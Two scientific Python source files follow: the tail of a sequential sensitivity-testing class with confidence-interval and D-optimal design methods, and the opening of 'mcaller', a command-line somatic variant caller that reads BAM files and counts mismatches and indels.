        raise Exception('Not enough data to estimate theta.')
    return self.theta
def print_estimators(self, cost=False):
    """Print the current parameter estimates to the console.

    Parameters
    ----------
    cost : boolean, optional
        If True, also print the negative log-likelihood at the current
        estimates. The default is False.

    Returns
    -------
    None.
    """
    if self.theta is None:
        raise Exception('Model not yet trained!')
    if check_diff(self.X, self.Y, self.inverted) > 0:
        raise Exception('Not enough data to estimate theta.')
    name_1, name_2 = self.est_names()
    value_1, value_2 = self.theta
    print('{}: {}\n{}: {}'.format(name_1, value_1, name_2, value_2))
    if cost:
        print('cost: {}'.format(self.cost))
def predict_probability(self, pts=None, confidence=None,
                        CI_level=None,
                        num_samples=1000, max_iter=5):
    """
    Returns the probability of a 'go' at pts. p(y=0|pt)

    Parameters
    ----------
    pts : array, optional
        The stimulus levels at which to compute probability predictions.
        The default is None. If None, range = max(X) - min(X) and
        pts = np.linspace(min(X)-0.05*range, max(X)+0.05*range, 100)
    confidence : str, optional
        The name of the method used to supply confidence intervals.
        Options are 'delta', 'perturbation' (same as delta), 'likelihood-ratio',
        'parametric-bootstrap', and 'nonparametric-bootstrap'.
        The default is None.
    CI_level : list, optional
        The confidence levels. Ignored if confidence is None.
        The default is [.5, .8, .9, .95].
    num_samples : int, optional
        The number of bootstrapped samples generated. Only used if
        confidence = 'parametric-bootstrap' or 'nonparametric-bootstrap'.
        The default is 1000.
    max_iter : int, optional
        The maximum number of attempts to map the likelihood ratio.
        Only used if confidence = 'likelihood-ratio'. The default is 5.

    Returns
    -------
    tuple
        (pts (n_pts, 1), predicted probability (n_pts, 1)) or, when
        confidence was requested,
        (pts, predicted probability, lower CI bounds, upper CI bounds)
        where lower/upper CI bounds have shape (n_pts, n_levels).
    """
    # BUG FIX: CI_level previously used a mutable list default argument;
    # resolve the default inside the call instead. Behavior is unchanged.
    if CI_level is None:
        CI_level = [.5, .8, .9, .95]
    if self.theta is None:
        raise Exception('Model not yet trained!')
    if check_diff(self.X, self.Y, self.inverted) > 0:
        raise Exception('Not enough data to make a prediction.')
    if pts is None:
        # Default grid: tested range padded by 5% on each side.
        xmin = np.min(self.X)
        xmax = np.max(self.X)
        xint = xmax-xmin
        xstart = xmin - xint*.05
        xend = xmax + xint*.05
        pts = np.linspace(xstart, xend, 100)
    pts = np.array(pts).reshape((-1,1))
    p = self.pred(pts, self.theta, self.inverted)
    if confidence is None:
        return pts, p
    elif confidence == 'parametric-bootstrap':
        # Bootstrap methods refit copies of the model, so hand them a clone.
        current_model = copy.deepcopy(self)
        lb, ub = parametric_bootstrap(current_model,
                                      pts,
                                      num_samples,
                                      CI_level)
        return pts, p, lb, ub
    elif confidence == 'nonparametric-bootstrap':
        current_model = copy.deepcopy(self)
        lb, ub = nonparametric_bootstrap(current_model,
                                         pts,
                                         num_samples,
                                         CI_level)
        return pts, p, lb, ub
    elif confidence == 'likelihood-ratio':
        new_bounds = increase_bounds(self.opt_config(self.X),
                                     'both', 'both')
        lb, ub = contour_walk(self, pts, new_bounds, [100],
                              CI_level, max_iter)
        return pts, p, lb, ub
    elif confidence == 'delta' or confidence == 'perturbation':
        lb, ub = delta(self,
                       pts,
                       num_samples,
                       CI_level, p)
        return pts, p, lb, ub
    else:
        ci_methods = [None, 'parametric-bootstrap',
                      'nonparametric-bootstrap', 'likelihood-ratio',
                      'delta', 'perturbation']
        raise ValueError("confidence '{}' not understood.\nPlease choose from {}".format(confidence, ci_methods))
def plot_probability(self, include_data=True, xlabel=None, ylabel=None,
                     alpha=1.0, save_dst=None, show=True, **kwargs):
    """
    A high-level method to call self.predict_probability and plot the result.

    Parameters
    ----------
    include_data : boolean, optional
        Whether or not to plot the data (stimuli and responses).
        The default is True.
    xlabel : str, optional
        If provided, the text for the plot xlabel. The default is None.
    ylabel : str, optional
        If provided, the text for the plot ylabel. The default is None.
    alpha : float, optional
        opacity of the observed data points. Must be between 0 and 1.
        Only used if include_data is True. Useful to visualize many overlapping
        data points. The default is 1.0.
    save_dst : str, optional
        The file path (including file type) where the plot should be saved.
        The default is None.
    show : boolean, optional
        If True, simply calls matplotlib.plt.show(). May be required for
        some IDEs. The default is True.
    **kwargs :
        All keyword arguments accepted by predict_probability can also be
        provided here.

    Returns
    -------
    None.
    """
    # Thin wrapper: the heavy lifting happens in plotting.plot_probability (pp).
    pp(self, include_data, xlabel, ylabel,
       alpha, save_dst, show, **kwargs)
def plot_confidence_region(self, limits, n, CI_levels=10,
                           save_dst=None, show=True):
    """
    A high-level function to plot the confidence region of the parameters.

    Parameters
    ----------
    limits : list
        The plot limits provided as [lower xlim, upper xlim, lower ylim, upper ylim].
    n : int or list of length 2
        The number of locations to sample in the x (theta_1) and y (theta_2) directions.
    CI_levels : int or list, optional
        If an integer, a filled contour plot will be produced with that
        many levels. If it is a list, the list values specify the confidence
        levels at which to draw contour lines. The default is 10.
    save_dst : str, optional
        The file path (including file type) where the plot should be saved.
        The default is None
    show : boolean, optional
        If True, simply calls matplotlib.plt.show(). May be required for
        some IDEs. The default is True.

    Returns
    -------
    None.
    """
    # Same preconditions as predict_probability: need a fit model with overlap.
    if self.theta is None:
        raise Exception('Model not yet trained!')
    if check_diff(self.X, self.Y, self.inverted) > 0:
        raise Exception('Not enough data to make a prediction.')
    pcr(self, limits, n, CI_levels, save_dst, show)
def __prompt_input(self):
    """
    Prompt the user for t1_min, t1_max, and t2_guess when the sequential
    design algorithm needs them and they were not supplied at construction
    (insufficient data or unspecified guesses). Used internally. Should not
    be called directly.

    Returns
    -------
    None.
    """
    t1n, t2n = self.est_names()
    self.t1_min = float(input('Lower bound guess for {}: '.format(t1n)))
    self.t1_max = float(input('Upper bound guess for {}: '.format(t1n)))
    self.t2_guess = float(input('Initial guess for {}: '.format(t2n)))
def __max_info(self, theta):
    """Return the stimulus level maximizing det(Fisher information) at theta.

    Searches by brute-force grid (Ns=100) refined with Nelder-Mead, over
    either the tested range padded by half a range on each side, or the
    user-supplied physical bounds.
    """
    def det(level):
        # Negated determinant of the 2x2 information matrix for the data
        # augmented with a hypothetical test at `level` (brute minimizes).
        X_test = np.vstack((self.X, level))
        info = self.info(X_test, theta[0], theta[1])
        return -1*(info[0][0] * info[1][1] - info[0][1] * info[1][0])
    ranges = self.max_s - self.min_s
    if self.lower_bound == None and self.upper_bound == None:
        res = brute(det, ((self.min_s - .5*ranges, self.max_s + .5*ranges),),
                    Ns=100, finish=fmin)
    else:
        if self.lower_bound == None:
            lb = self.min_s - ranges
        else: lb = self.lower_bound
        if self.upper_bound == None:
            # NOTE(review): self.min_s + ranges equals self.max_s exactly, so
            # this branch does not extend beyond the tested maximum; the
            # symmetric intent was probably self.max_s + ranges — confirm.
            ub = self.min_s + ranges
        else: ub = self.upper_bound
        res = brute(det, ((lb, ub),),
                    Ns=100, finish=fmin)
    if self.hist:
        # Debug trace: sample the determinant over a wide grid for plotting.
        if self.lower_bound == None:
            x_pts = np.linspace(self.min_s - 2.5*ranges,
                                self.max_s + 2.5*ranges,
                                500)
        else:
            x_pts = np.linspace(self.lower_bound - .1 * ranges,
                                self.upper_bound + .1 * ranges,
                                500)
        self.x_pts.append(x_pts)
        d_res = []
        for i in x_pts:
            d_res.append(-1*det(np.asarray(i)))
        self.det_vals.append(d_res)
        self.det_res.append(float(res))
    return float(res)
def __check_initial_theta(self):
    """Validate the user-supplied initial guesses before sequential design."""
    if self.t1_max <= self.t1_min:
        raise ValueError('t1_max cannot be less than t1_min!')
    elif self.t2_guess <= 0:
        raise ValueError('t2_guess must be positive!')
def next_pt(self):
    """
    The sequential design algorithm. Determines (and logs) the next
    suggested stimulus level based on the current phase: initial guess,
    binary search, overlap search, or maximum-likelihood D-optimal
    selection.

    Returns
    -------
    float
        The next suggested stimulus level (also cached as self.nx).
    """
    Y = self.Y.copy().astype(bool)
    if self.inverted:
        Y = np.logical_not(Y)
    if self.start:
        # First call: bootstrap from the prior guesses or from existing data.
        self.start = False
        if self.X.size == 0:
            custom_log(self, 'Starting Sequential Algorithm with No Data', True)
            if (self.t1_min is None) or (self.t1_max is None) or (self.t2_guess is None):
                self.__prompt_input()
            self.__check_initial_theta()
            self.nx = _round(self, (self.t1_min + self.t1_max) / 2.)
            check_bounds(self, self.nx)
            custom_log(self, 'Next Point Requested: {}'.format(self.nx))
            self.updated = 0
            return self.nx
        else:
            diff = check_diff(self.X, self.Y, self.inverted)
            if diff > 0:
                # Existing data but no overlap yet: need the initial guesses.
                if (self.t1_min is None) or (self.t1_max is None) or (self.t2_guess is None):
                    print("""Even though data has been provided, overlap has not been achieved.
In this case it is necessary to provide parameters for t1_min, t1_max, and t2_guess.
""")
                    self.__prompt_input()
                    self.__check_initial_theta()
                    return self.next_pt()
                else:
                    self.binary = False
                    self.overlap = False
                    return self.next_pt()
            # diff <= 0: overlap already present, fall through to the phases below.
    else:
        # Subsequent calls: only advance once new data has been posted;
        # otherwise re-serve the cached suggestion.
        if self.X.size > self.updated:
            self.updated = self.X.size
        else:
            return self.nx
    if self.binary:
        # --- Phase 1: binary search to bracket the transition region ---
        self.max_s = np.max(self.X)
        self.min_s = np.min(self.X)
        custom_log(self, 'In Binary Search Section', True)
        custom_log(self, 'Min Stimlus: {}'.format(self.min_s))
        custom_log(self, 'Max Stimulus: {}'.format(self.max_s))
        # all success case
        if Y.size == np.sum(Y):
            custom_log(self, 'In All Success Section', True)
            t1 = (self.t1_min + self.min_s) / 2.
            t2 = self.min_s - 2. * self.t2_guess
            t3 = 2. * self.min_s - self.max_s
            # BUG FIX: was min(t1, t2, t2); t3 was computed but never used.
            # Mirrors max(t1, t2, t3) in the all-failure case below.
            self.nx = _round(self, min(t1, t2, t3))
            check_bounds(self, self.nx)
            custom_log(self, 'Next Point Requested: {}'.format(self.nx))
            return self.nx
        # all failure case
        if np.sum(Y) == 0:
            custom_log(self, 'In All Failure Section', True)
            t1 = (self.t1_max + self.max_s) / 2.
            t2 = self.max_s + 2. * self.t2_guess
            t3 = 2. * self.max_s - self.min_s
            self.nx = _round(self, max(t1, t2, t3))
            check_bounds(self, self.nx)
            custom_log(self, 'Next Point Requested: {}'.format(self.nx))
            return self.nx
        self.min_go = np.min(self.X[Y])
        self.max_no = np.max(self.X[np.logical_not(Y)])
        self.diff = round(self.min_go - self.max_no, self.precision)
        custom_log(self, 'Min Go: {}'.format(self.min_go))
        custom_log(self, 'Max No-Go: {}'.format(self.max_no))
        custom_log(self, 'Difference: {}'.format(self.diff))
        custom_log(self, 'Theta 2 guess: {}'.format(self.t2_guess))
        if self.diff > self.t2_guess:
            # Gap still wide: bisect between the closest go and no-go.
            self.nx = _round(self, (self.max_no + self.min_go) / 2.)
            check_bounds(self, self.nx)
            custom_log(self, 'Next Point Requested: {}'.format(self.nx))
            return self.nx
        else:
            self.binary = False
    if self.overlap:
        # --- Phase 2: probe until a go below a no-go is observed ---
        custom_log(self, 'In Overlap Search Section', True)
        self.min_go = np.min(self.X[Y])
        self.max_no = np.max(self.X[np.logical_not(Y)])
        self.diff = round(self.min_go - self.max_no, self.precision)
        custom_log(self, 'Min Go: {}'.format(self.min_go))
        custom_log(self, 'Max No-Go: {}'.format(self.max_no))
        custom_log(self, 'Difference: {}'.format(self.diff))
        custom_log(self, 'Theta 2 guess: {}'.format(self.t2_guess))
        if self.diff > self.t2_guess:
            custom_log(self, 'Reverting Back to Binary Search', True)
            self.binary = True
            self.updated = -1
            return self.next_pt()
        if self.diff < 0:
            custom_log(self, '--- Overlap Achieved! ---', True)
            self.overlap = False
        else:
            # Provisional theta from the bracket; pick the D-optimal point
            # and shrink the theta_2 guess for the next iteration.
            self.theta[0] = (self.max_no + self.min_go) / 2.
            self.theta[1] = self.t2_guess
            custom_log(self, 'Maximize Determinate With...')
            t1n, t2n = self.est_names()
            custom_log(self, '{}: {}'.format(t1n, self.theta[0]))
            custom_log(self, '{}: {}'.format(t2n, self.theta[1]))
            self.nx = _round(self, self.__max_info(self.theta))
            self.t2_guess *= 0.8
            check_bounds(self, self.nx)
            custom_log(self, 'Next Point Requested: {}'.format(self.nx))
            return self.nx
    if self.mle:
        # --- Phase 3: refit the MLE, then pick the D-optimal next level ---
        custom_log(self, 'In Maximum Liklihood Section', True)
        self.max_s = max(self.X)
        self.min_s = min(self.X)
        custom_log(self, 'Min Stimlus: {}'.format(self.min_s))
        custom_log(self, 'Max Stimulus: {}'.format(self.max_s))
        self.fit(self.X, self.Y)
        t1n, t2n = self.est_names()
        custom_log(self, 'Estimated {}: {}'.format(t1n, self.theta[0]))
        custom_log(self, 'Estimated {}: {}'.format(t2n, self.theta[1]))
        # Clamp the estimates to the tested range to keep the search stable.
        self.theta[0] = max(self.min_s, min(self.theta[0], self.max_s))
        self.theta[1] = min(self.theta[1], self.max_s - self.min_s)
        custom_log(self, 'Bounded Estimated {}: {}'.format(t1n, self.theta[0]))
        custom_log(self, 'Bounded Estimated {}: {}'.format(t2n, self.theta[1]))
        self.nx = _round(self, self.__max_info(self.theta))
        check_bounds(self, self.nx)
        custom_log(self, 'Next Point Requested: {}'.format(self.nx))
        return self.nx
def post_test_outcome(self, res, pt):
    """
    Append a stimulus level and result to the existing data.

    Parameters
    ----------
    res : int or boolean
        The observed result at the tested stimulus level. Either 0, 1 or
        False, True.
    pt : float
        The stimulus level at which the test was performed.

    Returns
    -------
    None.
    """
    if isinstance(res, bool) or (res == 0) or (res == 1):
        self.X = np.vstack((self.X, pt))
        custom_log(self, 'Tested Points: \n {}'.format(self.X.flatten()))
        self.Y = np.vstack((self.Y, int(res)))
        custom_log(self, 'Test Results: \n {}'.format(self.Y.flatten()))
    else:
        # BUG FIX: braces need no escaping in a plain string; the old
        # '\{0, 1\}' emitted literal backslashes and is an invalid escape
        # sequence in modern Python.
        raise ValueError('Result must be {0, 1} or {True, False}!')
def loop(self, iterations=1000000):
    """
    This method suggests new test levels and accepts user input to calculate
    maximum likelihood estimates. That is, this method constitutes a loop.
    Loop will continue indefinitely until 'end' is received as user input
    during either the test level or result input queries. Alternatively,
    if a set number of specimens is to be used then the number of loops can
    be specified with the 'iterations' keyword argument.

    Parameters
    ----------
    iterations : int, optional
        End the loop automatically after n iterations. The default is 1000000.

    Returns
    -------
    None.
    """
    print('-'*50)
    print("""If the level at which the test is performed is the same as the
suggested level, then the user can simply press enter (no need for input)
when queried about the test level.""")
    print('\n')
    print("""When the user does not wish to test any more levels,
input "end" (without quotes) when queried abou the next test.""")
    print('-'*50)
    print('\n')
    for _ in range(iterations):
        nx = self.next_pt()
        print('Specimen number: {}'.format(self.X.size + 1))
        print('The next suggested test point is: {}'.format(nx))
        pt = input('Please input the level at which the test was performed: ')
        pt = "".join(pt.split()).lower()
        if pt == 'end':
            break
        elif pt == '':
            # Blank input means "tested at the suggested level".
            pt = nx
        else:
            try:
                pt = float(pt)
            except ValueError:
                # BUG FIX: was a bare `except:`, which also intercepted
                # KeyboardInterrupt and reported it as a bad level.
                print("Input level '{}' not understood. Try again. Type 'end' to terminate loop.".format(pt))
                continue
        res = input('Please input the result: ')
        res = "".join(res.split()).lower()
        print('\n')
        if res == 'true' or res == '1':
            self.post_test_outcome(1, pt)
        elif res == 'false' or res == '0':
            self.post_test_outcome(0, pt)
        elif res == '':
            pass
        elif res == 'end':
            break
        else:
            print("Result value '{}' not understood. Input must be 0 or False for a negative response and 1 or True for a positive response. Boolean inputs are not case sensitive. Try again. Type 'end' during input query to terminate loop.".format(res))
| StarcoderdataPython |
6416959 | <reponame>pongorlorinc/mcaller
import os
import optparse
import pysam
import sys
import numpy
import scipy
from scipy.stats import poisson
from scipy.stats import fisher_exact
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
# Command-line interface.  Only -g/-b/-i/-o are mandatory; every remaining
# option tunes a filtering or statistical threshold of the caller.
# NOTE(review): several thresholds are declared type=int although their
# defaults are floats (e.g. --noise 0.05, --pval 0.05); optparse only coerces
# user-supplied values, so the float defaults survive — confirm intent.
parser = optparse.OptionParser()
parser.add_option('-g', '--ref',
                  action="store", dest="genome_file",
                  help="path to fasta (required)", default="NA")
parser.add_option('-b', '--bed',
                  action="store", dest="bed",
                  help="bed file (required)", default="NA")
parser.add_option('-i', '--in',
                  action="store", dest="bam",
                  help="bam files, semicolon \';\' separated (required)\n", default="NA")
parser.add_option('-o', '--out',
                  action="store", dest="out_folder",
                  help="output folder to store files (required)\n", default="NA")
parser.add_option('-y', '--coord', action='store_true',
                  help='treat bed as exact coordiantes (quicker if mutations are known)', dest="coord", default=0)
parser.add_option('-x', '--aln', type=int,
                  action="store", dest="min_alignment_score",
                  help="minimum alignment score", default=1)
parser.add_option('-s', '--reg', type=int,
                  action="store", dest="region_interval",
                  help="region size for noise calculation", default=10)
parser.add_option('-n', '--noise', type=int,
                  action="store", dest="noise",
                  help="noise probability", default=0.05)
parser.add_option('-t', '--ncont', type=int,
                  action="store", dest="normal_mut_thresh",
                  help="normal sample max contamination", default=1)
parser.add_option('-w', '--mincov', type=int,
                  action="store", dest="min_cov",
                  help="minimum coverage during analysis", default=5)
parser.add_option('-e', '--edit', type=int,
                  action="store", dest="max_read_edit_distance",
                  help="max edit distance", default=4)
parser.add_option('-c', '--covfilt', type=int,
                  action="store", dest="filter_coverage",
                  help="filter mutations where coverage was not reached by samples", default=100)
parser.add_option('-p', '--pval', type=int,
                  action="store", dest="background_p_thresh",
                  help="p-value cutoff", default=0.05)
parser.add_option('-q', '--qfreq', type=int,
                  action="store", dest="freq_filter_high_cov",
                  help="mutation frequency filter for high coverage regions", default=2)
parser.add_option('-f', '--freq', type=int,
                  action="store", dest="freq_thresh",
                  help="mutation frequency filter for non-high coverage regions", default=5)
parser.add_option('-u', '--ncov', type=int,
                  action="store", dest="min_norm_cov",
                  help="minimum reads in normal sample", default=5)
parser.add_option('-m', '--mut', type=int,
                  action="store", dest="min_somatic_mut",
                  help="minimum mutant reads in cancer sample", default=4)
parser.add_option('-a', '--indel', type=int,
                  action="store", dest="minimum_indel_mut",
                  help="minimum mutant reads supporting indel in cancer sample", default=4)
parser.add_option('-d', '--maxprox', type=int,
                  action="store", dest="prox_indel_mut_count",
                  help="maximum proximal reads with indel before mutation filtering", default=2)
parser.add_option('-j', '--indeldist', type=int,
                  action="store", dest="prox_indel_dist",
                  help="distance when looking for proximal indels", default=5)
parser.add_option('-k', '--proxfile', action='store_true',
                  help='(boolean) filter for proximal indels (0:no / 1:yes)', dest="proximal_indel_filter", default=1)
parser.add_option('-l', '--indnoise', type=int,
                  action="store", dest="indel_noise_freq",
                  help="default noise when calculating background", default=0.01)
options, args = parser.parse_args()
# All four core inputs are mandatory; bail out with the usage text otherwise.
if(options.genome_file == "NA" or options.bed == "NA" or options.bam == "NA" or options.out_folder == "NA"):
    parser.print_help()
    sys.exit()
out_folder = options.out_folder
if not os.path.exists(out_folder):
    os.makedirs(out_folder)
# NOTE(review): genome_file is only bound when the path ends in ".fa"; any
# other extension leaves it undefined and crashes at SeqIO.parse below —
# confirm whether other extensions (.fasta, .fa.gz) should be supported.
if options.genome_file.endswith(".fa"):
    genome_file = options.genome_file
# Comma-separated BAM list; by convention the first entry is the matched
# normal sample and the remaining entries are tumour samples.
bamlist = list()
bamlist = options.bam.rstrip().split(',')
num_of_samples = len(bamlist)
# Echo the effective configuration so runs are self-documenting.
print ("\n---------------------------------")
print ("mcaller: joint genotyping program")
print ("---------------------------------")
print ("Main parameters:\n")
print ("\tBAM files:\t%s" % bamlist)
print ("\tGenome:\t\t%s" % genome_file)
print ("\tOutfold:\t\"%s\"" % out_folder)
print ("\tBEDfile:\t%s" % options.bed)
print ("\n\nAdditional parameters:\n")
print ("\tTreat bed as coordinate: %d\n" %options.coord)
print ("\t(boolean) filter for proximal indels (0:no / 1:yes): %d" %options.proximal_indel_filter)
print ("\tDistance when looking for proximal indels: %d" %options.prox_indel_dist)
print ("\tMaximum proximal reads with indel before mutation filtering: %d\n" %options.prox_indel_mut_count)
print ("\tMinimum alignment score: %d" %options.min_alignment_score)
print ("\tMax edit distance in read: %d" %options.max_read_edit_distance)
print ("\tRegion size for noise calculation: %d" %options.region_interval)
print ("\tSequencing error probability: %d" %options.noise)
print ("\tNormal sample max contamination: %d" %options.normal_mut_thresh)
print ("\tMinimum coverage during analysis: %d\n" %options.min_cov)
print ("\tMutation p-value cutoff: %d" %options.background_p_thresh)
print ("\tMutation frequency filter for high coverage regions: %d" %options.freq_filter_high_cov)
print ("\tMutation frequency filter for low coverage regions: %d" %options.freq_thresh)
print ("\tMinimum mutant reads in (any) cancer sample: %d" %options.min_somatic_mut)
print ("\tMinimum mutant reads supporting indel in cancer sample: %d" %options.minimum_indel_mut)
print ("\tMinimum reads in normal sample to call germline mutation: %d" %options.min_norm_cov)
print ("\tFilter mutations where coverage was not reached by any samples: %d" %options.filter_coverage)
print ("---------------------------------\n")
input_coords = options.coord
# Progress log of finished BED entries (allows resuming/inspection) and the
# main result table; the header carries one column per input BAM.
bedlogfile = out_folder + "/entries_finished.bed"
bedloghandle = open(bedlogfile, "w+")
mutationfile = out_folder + "/mutations.txt"
mutationhandle = open(mutationfile, "w+")
mutationhandle.write("chr\tpos\tref\talt\tstatus\taccept\t%s\n" % ("\t".join(os.path.basename(bamlist[y]) for y in range(0, len(bamlist)))))
# Whole reference genome is loaded into memory as {contig_name: SeqRecord}.
print ("Importing genome:")
records = SeqIO.to_dict(SeqIO.parse(open(genome_file), 'fasta'))
print ("\tfinished importing genome")
###################### VARIABLES ######################
# base: nucleotide -> row index of the per-base count matrices;
# rb: the inverse mapping, used when reporting called alleles.
base = dict()
rb = dict()
base["A"] = 0
base["C"] = 1
base["G"] = 2
base["T"] = 3
rb[0] = "A"
rb[1] = "C"
rb[2] = "G"
rb[3] = "T"
# Short module-level aliases for the CLI options used throughout the caller.
min_alignment_score = options.min_alignment_score
region_interval = options.region_interval
noise = options.noise
background_p_thresh = options.background_p_thresh
# Phred base qualities are assumed to be < 42, so the per-strand quality
# matrices have one row per (base, quality) pair: 4 * 42 rows.
q_max = 42
q_m_height = 4 * 42
min_cov = options.min_cov
max_read_edit_distance = options.max_read_edit_distance
filter_coverage = options.filter_coverage
normal_mut_thresh = options.normal_mut_thresh
freq_filter_high_cov = options.freq_filter_high_cov
freq_thresh = options.freq_thresh
min_somatic_mut = options.min_somatic_mut
min_norm_cov = options.min_norm_cov
indel_noise_freq = options.indel_noise_freq
proximal_indel_filter = options.proximal_indel_filter
prox_indel_dist = options.prox_indel_dist
prox_indel_mut_count = options.prox_indel_mut_count
minimum_indel_mut = options.minimum_indel_mut
###################### VARIABLES ######################
def get_edit_distance(read, in_chr, start, g_m_start, m_end, mismatch):
    """Walk the CIGAR of *read*, returning (edit_distance, mismatch).

    edit_distance counts mismatching aligned bases plus one per indel
    event; the shared *mismatch* array (indexed relative to g_m_start)
    is incremented at every mismatching base and, for indels, in a small
    window around the event so nearby positions are flagged as noisy.
    """
    edit_distance = 0
    genome_pos = read.reference_start
    read_pos = 0
    for (cigarType, cigarLength) in read.cigartuples:
        if cigarType == 0:  # MATCH bases in read (M cigar code)
            genome_end = genome_pos + cigarLength
            read_end = read_pos + cigarLength
            ref_seq = records[in_chr].seq[genome_pos:genome_end].upper()
            read_seq = read.query_sequence[read_pos:read_end]
            frag_len = len(ref_seq)
            for i in range(0, frag_len):
                t_g_pos = genome_pos + i - g_m_start
                if read_seq[i] in base:
                    # fix: also require t_g_pos >= 0 — a negative index
                    # would silently wrap and corrupt counts at the tail
                    # of the mismatch array
                    if 0 <= t_g_pos < m_end:
                        if ref_seq[i] != read_seq[i]:
                            mismatch[t_g_pos] += 1
                            edit_distance += 1
            genome_pos = genome_end
            read_pos = read_end
        elif cigarType == 1:  # INS in read (I cigar code)
            t_g_pos = genome_pos - g_m_start
            read_end = read_pos + cigarLength
            read_pos = read_end
            edit_distance += 1
            # mark a window around the insertion point as mismatch-prone
            for x in range(-2, 2):
                temp_pos = t_g_pos + x
                if 0 <= temp_pos < m_end:  # fix: guard negative indices too
                    mismatch[temp_pos] += 1
        elif cigarType == 2:  # DELETION in read (D cigar code)
            t_g_pos = genome_pos - g_m_start
            genome_end = genome_pos + cigarLength
            genome_pos = genome_end
            edit_distance += 1
            for x in range(-2, 2):
                temp_pos = t_g_pos + x
                if 0 <= temp_pos < m_end:  # fix: guard negative indices too
                    mismatch[temp_pos] += 1
        elif cigarType == 3:  # SPLICED region: skipped bases on reference (N)
            genome_pos += cigarLength  # jump to next coordinate by skipping bases
        elif cigarType == 4:  # SOFTCLIP: consumes read only
            read_pos += cigarLength
        else:
            pass  # H/P and other ops consume neither sequence we track
    return edit_distance, mismatch
# Input: a pysam aligned read.
# Output: 1 when the read is usable for variant calling, 0 otherwise.
def accept_read(in_read):
    """Screen a read: mapping quality, duplicates, pairing and hard clips."""
    cigar = in_read.cigartuples
    rejected = (
        in_read.mapping_quality < min_alignment_score
        or in_read.is_duplicate
        or in_read.reference_id < 0
        or in_read.next_reference_id < 0
        # read and its mate must map to the same contig
        or in_read.reference_name != in_read.next_reference_name
        or cigar is None
        # hard-clipped (op code 5) at either end
        or cigar[0][0] == 5
        or cigar[-1][0] == 5
    )
    return 0 if rejected else 1
def import_reads(in_chr, start, end, samfile, g_m_start, m_end, mismatch, reads):
    """Collect acceptable reads overlapping [start, end) into *reads*.

    Every candidate passing accept_read() contributes its per-base mismatch
    profile to the shared *mismatch* array; only reads whose edit distance
    stays below max_read_edit_distance are kept for genotyping.
    """
    for candidate in samfile.fetch(in_chr, start, end):
        if accept_read(candidate) != 1:
            continue
        dist, mismatch = get_edit_distance(candidate, in_chr, start,
                                           g_m_start, m_end, mismatch)
        if dist < max_read_edit_distance:
            reads.append(candidate)
    return reads, mismatch
def import_data(reads, coverage, base_array, r_q_matrix, f_q_matrix, m_array, in_chr, g_m_start, m_end, active_pos, indels, s_num, indarray, mismatch):
    """Accumulate one sample's read evidence into its count matrices.

    coverage / base_array / m_array: depth, per-base and mismatch counts
    per position (positions are relative to g_m_start);
    f_q_matrix / r_q_matrix: forward-/reverse-strand (base, quality)
    histograms with q_max rows per base;
    indels: {position: {"ref\\talt": [[sample, min_qual, strand, pos], ...]}};
    active_pos marks candidate positions for later genotyping;
    s_num is this sample's index; mismatch is the cross-sample profile
    already built by get_edit_distance().
    Returns the updated structures.
    """
    for read in reads:
        genome_pos = read.reference_start
        read_pos = 0
        for (cigarType,cigarLength) in read.cigartuples:
            if cigarType == 0: #MATCH bases in read (M cigar code)
                genome_end = genome_pos + cigarLength
                read_end = read_pos + cigarLength
                ref_seq = records[in_chr].seq[genome_pos:genome_end].upper()
                read_seq = read.query_sequence[read_pos:read_end]
                read_qual = read.query_qualities[read_pos:read_end]
                frag_len = len(ref_seq)
                t_g_pos = genome_pos - g_m_start - 1
                for i in range(0, frag_len):
                    t_g_pos += 1
                    # NOTE(review): only positions with mismatch[t_g_pos] > 1
                    # (seen mismatching in at least 2 reads) are tallied, so
                    # coverage here is only tracked at candidate sites —
                    # confirm this is intentional.
                    if t_g_pos < m_end and read_seq[i] in base and mismatch[t_g_pos] > 1:
                        # row index: base row block of size q_max plus quality
                        t_index = q_max*base[read_seq[i]] + read_qual[i]
                        if t_index > -1 and t_index < q_m_height:
                            if read.is_reverse:
                                r_q_matrix[t_index][t_g_pos] += 1
                            else:
                                f_q_matrix[t_index][t_g_pos] += 1
                            if ref_seq[i] != read_seq[i]:
                                m_array[t_g_pos] += 1
                                active_pos[t_g_pos] = 1
                            coverage[t_g_pos] += 1
                            base_array[base[read_seq[i]]][t_g_pos] += 1
                genome_pos = genome_end
                read_pos = read_end
            elif cigarType == 1: #INS in read (I cigar code)
                # insertion key includes the anchoring reference base
                read_end = read_pos + cigarLength
                read_seq = read.query_sequence[read_pos-1:read_end]
                ref_seq = records[in_chr].seq[genome_pos-1]
                t_g_pos = genome_pos - g_m_start - 1
                indel_key = ref_seq + "\t" + read_seq
                indel_strand = 0
                if t_g_pos < m_end:
                    if read.is_reverse:
                        indel_strand = 1
                    if t_g_pos not in indels:
                        indels[t_g_pos] = {}
                    # record [sample, min quality over inserted bases, strand, 1-based offset]
                    if indel_key not in indels[t_g_pos]:
                        indels[t_g_pos][indel_key] = ([[s_num, min(read.query_qualities[read_pos:read_end]), indel_strand, t_g_pos + 1]])
                    else:
                        indels[t_g_pos][indel_key].append([s_num, min(read.query_qualities[read_pos:read_end]), indel_strand, t_g_pos + 1])
                    indarray[t_g_pos] += 1
                    active_pos[t_g_pos] = 1
                read_pos = read_end
            elif cigarType == 2: #DELETION in read (D cigar code)
                # deletion key: deleted reference span vs. the anchoring base
                genome_end = genome_pos + cigarLength
                ref_seq = "".join(records[in_chr].seq[y] for y in range(genome_pos-1, genome_end))
                read_seq = read.query_sequence[read_pos-1:read_pos]
                t_g_pos = genome_pos - g_m_start
                if t_g_pos < m_end:
                    indel_key = ref_seq + "\t" + read_seq
                    indel_strand = 0
                    if read.is_reverse:
                        indel_strand = 1
                    if t_g_pos not in indels:
                        indels[t_g_pos] = {}
                    if indel_key not in indels[t_g_pos]:
                        indels[t_g_pos][indel_key] = ([[s_num, min(read.query_qualities[read_pos:read_pos+1]), indel_strand, t_g_pos]])
                        #print (indels[t_g_pos])
                    else:
                        indels[t_g_pos][indel_key].append([s_num, min(read.query_qualities[read_pos:read_pos+1]), indel_strand, t_g_pos])
                        #print (indels[t_g_pos])
                    indarray[t_g_pos] += 1
                    active_pos[t_g_pos] = 1
                genome_pos = genome_end
            elif cigarType == 3: #SPLICED region in read representing numer of skipped bases on reference (N cigar code)
                genome_pos += cigarLength #jump to next coordinate by skipping bases
            elif cigarType == 4: #SOFTCLIP
                read_pos += cigarLength
            else:
                pass
    return coverage, base_array, r_q_matrix, f_q_matrix, m_array, active_pos, indels, indarray
